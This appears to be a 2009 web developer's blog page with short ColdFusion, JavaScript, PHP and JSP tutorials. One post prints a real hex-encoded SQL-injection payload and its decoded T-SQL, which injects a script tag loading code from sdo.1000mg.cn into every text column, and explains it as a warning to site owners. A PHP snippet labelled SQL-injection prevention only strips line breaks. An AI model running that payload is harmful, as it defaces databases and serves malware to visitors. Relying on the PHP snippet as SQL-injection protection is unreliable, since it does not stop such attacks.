Dynamically create textarea with Javascript

Apr 30

posted by Pyae Phyoe Shein in Javascript, HTML | 0 Comments Bookmark and Share

One of my projects need our clients to create textarea input dynamically with javascript. Seems it's kinda simple but actually, create dynamically is simple but how to fetch data from these is kinda complicated. So, I reserach through and thinking of about that. Finally, I gotcha..!! Here you gooo...

Example.html

view plain print about
1<form name="mycomposeForm">
2<p id="parah"></p>
3<input type="hidden" name="mytextcount">
4<a href="javascript:addInput()">Add more input field(s)</a><br>
5<a href="javascript:deleteInput()">Remove field(s)</a>
6<form>
7
8<invalidTag>
9var arrInput = new Array(0);
10var arrInputValue = new Array(0);
11function addInput() {
12arrInput.push(arrInput.length);
13arrInputValue.push("");
14display();
15}
16function display() {
17document.getElementById('parah').innerHTML="";
18for (intI=0;intI<arrInput.length;intI++) {
19document.getElementById('parah').innerHTML+=createInput(arrInput[intI], arrInputValue[intI]);
20}
21}
22function saveValue(intId,strValue) {
23arrInputValue[intId]=strValue;
24}
25function createInput(id,value) {
26return "<textarea cols='40' rows='5' id='test "+ id +"' name='test "+ id +"' onChange='javascript:saveValue("+ id +",this.value)' value='"+ value +"'></textarea><br>";
27}
28function deleteInput() {
29if (arrInput.length > 0) {
30arrInput.pop();
31arrInputValue.pop();
32}
33display();
34}
35var arrInput = new Array(0);
36
37var arrInputValue = new Array(0);
38
39function addInput() {
40
41arrInput.push(arrInput.length);
42
43arrInputValue.push("");
44
45display();
46
47}
48
49function display() {
50
51document.getElementById('parah').innerHTML="";
52
53for (intI=0;intI<arrInput.length;intI++) {
54
55document.getElementById('parah').innerHTML+=createInput(arrInput[intI], arrInputValue[intI]);
56
57}
58
59}
60
61function saveValue(intId,strValue) {
62
63arrInputValue[intId]=strValue;
64
65}
66
67function createInput(id,value) {
68
69return "<textarea cols='40' rows='5' id='test "+ id +"' name='test "+ id +"' onChange='javascript:saveValue("+ id +",this.value)' value='"+ value +"'></textarea><br>";
70
71}
72
73function deleteInput() {
74
75if (arrInput.length > 0) {
76
77arrInput.pop();
78
79arrInputValue.pop();
80
81}
82
83display();
84
85}
86
87</script>

This entry was posted on April 30, 2009 at 6:32 AM and has received 1586 views. There are currently 0 comments. Print this entry.

What is QQdownload?

Apr 27

posted by Pyae Phyoe Shein in CF Function, Coldfusion, CF Tag | 0 Comments Bookmark and Share

My site has been crushed in these days because of being attacked by SQL injection. That's why I've prevented anyone can attacking using SQL injection and not my SQL server to be over-loaded of this case. That's why I check whether the abnormal informations are in the log file of my site or not. At that time, I've found ever QQDownload word after SQL injection attack. 211.93.127.34 Mozilla/4.0 (compatible;+MSIE+ 6.0;+Windows+ NT+5.1;+SV1;+QQDownload+1.7;+WPS). So, I gotta block the browser of anyone installed QQDownload for the sake of my site not to be over-loaded. That's why I've put following coding in application.cfm of my site.

view plain print about
1<cfset gotcha = findnocase("HTTrack",HTTP_USER_AGENT)>
2<cfset gotcha =#findnocase("QQDownload",HTTP_USER_AGENT)>
3<cfif gotcha NEQ 0>
4    <cflocation url="http://SiteURL/messages.cfm?message=QQDownload has been blocked" addtoken="no" />
5</cfif>

This entry was posted on April 27, 2009 at 6:32 AM and has received 827 views. There are currently 0 comments. Print this entry.

Ajax upload with ColdFusion

Apr 26

posted by Pyae Phyoe Shein in Ajax, CF Function, Coldfusion, CF Tag | 0 Comments Bookmark and Share

I've once wrote file upload with flash. But I'm thinking of the weak point of this program would be alright if users don't have flash player as well as using with GuestAccount. That's I need to consider how to solve this problem and want to do file upload with Ajax. Eventually, I can do it. Here is coding.

index.cfm

view plain print about
1<html>
2<head>
3<title>AJAX File Uploader</title>
4<invalidTag language="javascript" type="text/javascript">
5<!--
6function startUpload(){
7document.getElementById('f1_upload_process').style.visibility = 'visible';
8document.getElementById('f1_upload_form').style.visibility = 'hidden';
9return true;
10}
11
12function stopUpload(success){
13var result = '';
14if (success == 1){
15result = '<span class="msg">The file was uploaded successfully!<\/span><br/><br/>';
16}
17else {
18result = '<span class="emsg">There was an error during file upload!<\/span><br/><br/>';
19}
20document.getElementById('f1_upload_process').style.visibility = 'hidden';
21document.getElementById('f1_upload_form').innerHTML = result + '<label>File: <input name="myfile" type="file" size="30" /><\/label><label><input type="submit" name="submitBtn" class="sbtn" value="Upload" /><\/label>';
22document.getElementById('f1_upload_form').style.visibility = 'visible';
23return true;
24}
25//-->
26</script>
27</head>
28
29<body>
30<form action="upload.cfm" method="post" enctype="multipart/form-data" target="upload_target" onsubmit="startUpload();" >
31<p id="f1_upload_process">Loading...<br/><img src="loader.gif" /><br/></p>
32<p id="f1_upload_form" align="center"><br/>
33<label>File:
34<input name="myfile" type="file" size="30" />
35</label>
36<label>
37<input type="submit" name="submitBtn" value="Upload" />
38</label>
39</p>
40
41<invalidTag id="upload_target" name="upload_target" src="#" style="width:0;height:0;border:0px solid #fff;"></iframe>
42</form>
43</body>

Upload.cfm

view plain print about
1<cffile action="UPLOAD" filefield="myfile" destination="D:/test/ajaxupload/files/" nameconflict="MAKEUNIQUE">
2<cfset myfile = file.serverfile>
3
4<invalidTag language="javascript" type="text/javascript">window.top.window.stopUpload('1');</script>
How? It's easy thought, isn't it?

Best Credit to : http://www.ajaxf1.com/download.html?item=12

This entry was posted on April 26, 2009 at 6:32 AM and has received 1098 views. There are currently 0 comments. Print this entry.

Generate RSS Feed with ColdFusion MX

Apr 22

posted by Pyae Phyoe Shein in CF Function, Coldfusion, CF Tag | 0 Comments Bookmark and Share

Do you know how to generate RSS Feed with ColdFusion MX? If you don't know well about CFMX, it might be complicated and fussy. But you little know about XML technology, it's quite simple.

First of all, you need to put this, cfsettingenablecfoutputonly="yes" at the top of the page. After that, output your query just like

view plain print about
1<CFQUERY NAME="RssQry" datasource="MyDSN">
2    SELECT *
3    FROM RssTable
4    WHERE
5    Rss_status = <cfqueryparam cfsqltype="CF_SQL_INTEGER" null="no" value="1">
6    ORDER BY Rss_id
7</CFQUERY>
8
9<cfsavecontent variable="theXML">
10<cfoutput>
11<?xml version="1.0" encoding="ISO-8859-1" ?>
12<rss version="2.0">
13<channel>
14<title>RSS</title>
15<link>http://www.rss.com</link>
16<description>This is Description</description>
17<language>en-us</language>
18<copyright>Copyright --- .</copyright>
19<docs>http://-----.com/rss/</docs>
20<lastBuildDate>#dateformat(now(), "ddd, dd mmm yyyy")# #timeformat(now(), "HH:mm:ss")# EST</lastBuildDate>
21</cfoutput>
22
23<cfloop from="1" to="#RssQry.RecordCount#" index="ctr">
24<cfscript>
25title = replace(RssQry.Rss_title[ctr], "<", "&amp;lt;", "ALL");
26description = replace(RssQry.Rss_description[ctr], "<", "&amp;lt;", "ALL");
27description = replace(description, "&amp;", "&amp;amp;", "ALL");
28description = replace(description, '"', 1, "'", "ALL");
29date = dateformat(RssQry.Rss_posted_date[ctr], "ddd, dd mmm yyyy");
30time = timeformat(RssQry.Rss_posted_date[ctr], "HH:mm:ss") &amp; " EST";
31author = replace(RssQry.Rss_author[ctr], "<", "&amp;lt;", "ALL");
32author_email = replace(RssQry.Rss_author_email[ctr], "at>", "@", "ALL");
33author_email = replace(author_email, "<", "&amp;lt;", "ALL");
34</cfscript>
35
36<cfoutput>
37<item>
38<title>#title#</title>
39<description>#description#</description>
40<link>http://tutorial#RssQry.Rss_id[ctr]#.easycfm.com</link>
41<author>#author_email# (#author#)</author>
42<pubDate>#date# #time#</pubDate>
43</item>
44</cfoutput>
45</cfloop>
46<cfoutput>
47</channel>
48</rss>
49</cfoutput>
50</cfsavecontent>

This entry was posted on April 22, 2009 at 6:32 AM and has received 480 views. There are currently 0 comments. Print this entry.

SQL Injection prevented by PHP

Apr 21

posted by Pyae Phyoe Shein in MySql, PHP, MsSql | 0 Comments Bookmark and Share

Above posts, I've described the figure of SQL ASCII Injections and the solutions of this prevented by asp, asp.net and cfmx. In this post, I'll show how to prevent SQL ASCII Injection attacks by the way of inserting ASCII codes in PHP.

view plain print about
1function clean_header($string)
2{
3$string = trim($string);
4
5// From RFC 822: "The field-body may be composed of any ASCII
6// characters, except CR or LF."
7if (strpos($string, "\n") !== false) {
8$string = substr($string, 0, strpos($string, "\n"));
9}
10if (strpos($string, "\r") !== false) {
11$string = substr($string, 0, strpos($string, "\r"));
12}
13
14return $string;
15}
This is just a class, and you always need to call this class before saving data into database from input box. It's simple though.

Big Credit to : http://xtian.goelette.info/archives/38-Email-injection-attack.html

This entry was posted on April 21, 2009 at 6:32 AM and has received 581 views. There are currently 0 comments. Print this entry.

Dictionary site based on Web 2.0

Apr 13

posted by Pyae Phyoe Shein in Project | 0 Comments Bookmark and Share

I'm now trying to create one Dictionary site based on Web 2.0 (Non-profit). But, I'm confused which kind of web programming should I use for less hosting cost, more reliable and best security. I can say I'm not too bad in ColdFusion. Unfortunately if I create dictionary website with CF, I cannot effort the CFMX hosting cost because it's more higher than Open-source web programming like PHP. I was supposed to create dictionary site with PHP but I'm afraid of all of PHP expert people will hack my site. That's why I'm now trying to learn JSP for creating my dictionary site. I thought JSP language will be complicated like ASP.NET. Really, it's not kinda complicated and the one I like is I can do it to be extension-less. If I search "test" in my dictionary, it will show like http://www.ppshein-dictionary.com/search?word=test It's cool, isn't it?

If you have any idea to suggest if you've had experiences in writing dictionary software, kindly drop comment.

This entry was posted on April 13, 2009 at 6:32 AM and has received 490 views. There are currently 0 comments. Print this entry.

Coldfusion and J2EE

Apr 12

posted by Pyae Phyoe Shein in CF Function, Coldfusion, J2EE, CF Tag | 0 Comments Bookmark and Share

Normally, different language of web programmings are not easy to integrate in the same web page. Although you want to integrate two programming languages in the same webpage, you gotta separate such coding in different portion in tag or something else. In CFMX, you don't need to do like anymore. If you wanna embed in J2EE tags in CFM page, use tag then. Here is simple coding :

view plain print about
1<cfimport taglib="/WEB-INF/lib/random.jar" prefix="myrand">
2<myrand:number id="randPass" range="000000-999999" algorithm="SHA1PRNG" provider="SUN" />
3<cfset myPassword = randPass.random>
4<cfoutput>
5Your password is #myPassword#<br>
6</cfoutput>

Big Credit to : http://livedocs.adobe.com/coldfusion/6/Developing_ColdFusion_MX_Applications_with_CFML/Java3.htm#1134309

This entry was posted on April 12, 2009 at 6:32 AM and has received 473 views. There are currently 0 comments. Print this entry.

ASCII Encoded/Binary String Automated SQL Injection Attack

Apr 11

posted by Pyae Phyoe Shein in MySql, MsSql | 0 Comments Bookmark and Share

In these days, some websites have been attacked by ASCII Encoded/Binary String Automated SQL Injection Attack, by the way of using of using such binary string after query string of your website.

view plain print about
1?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST
2(0x4445434C4152452040542076617263686172283235352
392C40432076617263686172283430303029204445434C41
45245205461626C655F437572736F7220435552534F52204
564F522073656C65637420612E6E616D652C622E6E616D65206672
66F6D207379736F626A6563747320612C737973636F6C75
76D6E73206220776865726520612E69643D622E696420616E
86420612E78747970653D27752720616E642028622E7874797
90653D3939206F7220622E78747970653D3335206F7220622
10E78747970653D323331206F7220622E78747970653D31
11363729204F50454E205461626C655F43757273
126F72204645544348204E4558542046524F4D20205
13461626C655F437572736F7220494E5
1444F2040542C4043205748494C4528404046455443485F53544
1515455533D302920424547494E206578656328
1627757064617465205B272B40542B2
1775D20736574205B272B40432B275D3D5B272B
1840432B275D2B2727223E3C2F7469
19746C653E3C736372697074207372633D22687
20474703A2F2F73646F2E313030306
21D672E636E2F63737273732F772E6A73223E3C
222F7363726970743E3C212D2D2727
2320776865726520272B40432B27206E6F74206C
24696B6520272725223E3C2F74697
2546C653E3C736372697074207372633D2268747
264703A2F2F73646F2E313030306D
27672E636E2F63737273732F772E6A73223E3C2F
287363726970743E3C212D2D27272
297294645544348204E4558542046524F4D20205
30461626C655F437572736F7220494
31E544F2040542C404320454E4420434C4F53452
3205461626C655F437572736F72204
33445414C4C4F43415445205461626C655F4375
3472736F72%20AS%20CHAR(4000));
35EXEC(@S);
Really, it's encoded format of store procedure string. To convert it into SQL format, here is coding
view plain print about
1DECLARE @SCHAR(4000);SET @S=CAST(DECLARE @T varchar(255)'@C
2varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name'b.name
3from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and
4(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN
5Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C
6WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
7['+@C+']=['+@C+']+''"></title><invalidTag
8src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where
9'+@C+' not like ''%"></title><invalidTag
10src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')
11FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor
12DEALLOCATE Table_Cursor AS% CHAR(4000));EXEC(@S)
If someone does like that or if your sites doesn't prevent for SQL injection, all of nvarchar field in your database will be inserted into such string Bookmark and Share

There are so many extension-less web programming in Web developement environment such as Ruby, PHP, JSP and so on. Among them, I want to tell about the simple coding of JSP. Honestly, I'm just beginner to learn JSP, especially J2EE. Because, I just want to know some applications based on Sun Java. Ok, let's go...

Here is simple JSP file and named as greeting.jsp

view plain print about
1<html>
2<body>
3    Hello World! <br>
4    Current time is <%= new java.util.Date() %>
5</body>
6</html>
And create web.xml file and here is coding needed to be in this file.

view plain print about
1<?xml version="1.0" encoding="ISO-8859-1"?>
2<!DOCTYPE web-app PUBLIC '-//Sun Microsystems, Inc.//DTD Web
3Application 2.3//EN' 'http://java.sun.com/dtd/web-app_2_3.dtd'>
4<web-app>
5<display-name>Hello2</display-name>
6<description>no description</description>
7<servlet>
8<servlet-name>greeting</servlet-name>
9<display-name>greeting</display-name>
10<description>no description</description>
11<!-- what gets called -->
12<jsp-file>/greeting.jsp</jsp-file>
13</servlet>
14<servlet-mapping>
15<servlet-name>greeting</servlet-name>
16<!-- URL from browser -->
17<url-pattern>/greeting</url-pattern>
18</servlet-mapping>
19</web-app>

Then, open tomcat manager and create folder name as hello. Create build folder, then copy above greeting.jsp file in this folder, then create WEB-INF folder in build folder. Finally, web.xml file into WEB-INF

Open your Internet Explorer or Firefox, and can run as http://localhost:8080/hello/greeting. How? It's quite simple, right?

This entry was posted on April 3, 2009 at 6:32 AM and has received 502 views. There are currently 0 comments. Print this entry.

How to export data as Excel format in Cold Fusion

Apr 2

posted by Pyae Phyoe Shein in CF Function, Coldfusion, CF Tag | 0 Comments Bookmark and Share

I'm trying to export all of data in my table in excel format by using Cold Fusion. I thought it would be complicated and hard to implement. After reading through Cold Fusion documents, it's as easy as ABC. Here is sample coding :

view plain print about
1<cfheader name="Content-Disposition" value="inline; filename=GiftLists.xls">
2<cfcontent type="application/vnd.msexcel">
3
4<cfquery name="PMQry">
5    SELECT P_Name, Org_Name FROM Persons
6    LEFT JOIN Organizations ON Org_ID = P_Organization
7</cfquery>
8
9<table border="2">
10    <tr>
11        <th>No.</th>
12        <th>Name</th>
13        <th>Organi</th>
14    </tr>
15    <cfoutput query="PMQry">
16    <tr>
17        <td>#currentrow#.</td>
18        <td>#P_Name#</td>
19        <td>#Org_Name#</td>
20    </tr>
21    </cfoutput>
22</table>

How? It's kinda easy, isn't it?

This entry was posted on April 2, 2009 at 6:32 AM and has received 436 views. There are currently 0 comments. Print this entry.

Top of Page